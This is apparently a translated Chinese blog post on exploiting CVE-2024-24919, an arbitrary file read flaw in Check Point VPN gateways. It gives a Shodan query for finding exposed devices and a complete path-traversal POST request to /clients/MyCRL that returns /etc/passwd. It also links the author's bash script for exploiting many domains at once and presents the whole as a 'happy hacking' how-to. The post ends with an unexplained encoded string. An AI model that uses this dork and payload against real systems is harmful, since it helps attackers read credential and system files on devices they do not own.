CVE-2024–24919:Check Point VPN网关中的任意文件读取漏洞
作者: $ubh@nk@r 阅读时间: 2 分钟 发布日期: 2024年6月7日
简介: 大家好,黑客们!👋 在今天的文章中,我将讨论一个名为 CVE-2024-24919 的最新漏洞。我们将在此了解如何识别该漏洞并利用它。该漏洞在 Check Point 的 CloudGuard 网络安全设备中被发现。我还将向大家介绍一个工具,可以轻松地在大范围目标上自动化利用此漏洞。那么,我们开始吧。
Shodan Dork: 任何人都可以使用以下 Shodan Dork 来查找此 CVE:
Server:"Check Point SVN Foundation""org"
利用 CVE-2024–24919:
该漏洞可通过向 /clients/MyCRL 端点发送特制的 POST 请求来利用。以下是利用思路:
POST /clients/MyCRL HTTP/1.1
host: target
Content-Length: 39
aCSHELL/../../../../../../../etc/passwd [POST Body]
如果目标域名存在漏洞,它将显示 /etc/passwd 文件的内容。
自动化利用 CVE-2024–24919: 最后,我编写了一个 Bash 脚本来自动化此漏洞利用过程。 GitHub - starlox0/CVE-2024-24919-POC: 一个用于自动化CVE-2024-24919的简单漏洞利用代码(POC)
本质上,我利用了这一个单行的 curl 命令行工具。
我将此工具用在我的脚本中。你可以针对单个域名或多个域名进行测试。
→ 针对多个域名。
多么简单!😄
这就是今天的内容。希望你们学到了一些新东西。请继续关注我的下一篇文章。 感谢阅读! 😄 如果喜欢,别忘了点赞并关注我以获取更多文章。 祝你黑客愉快! ~ CSD0tFqvECLokhw9aBeRqteIgvZsxhm14qXjGWMVhkLNkfLFNQQTShIX6r8NWdTB6q2Q58n9qUz/4bOKG29WEpTrhaqSQOmZhCdmEm86OFQmJXE1k7fcUhBHzLwh58Ey25A7g89h4prYzdSx2bHjow==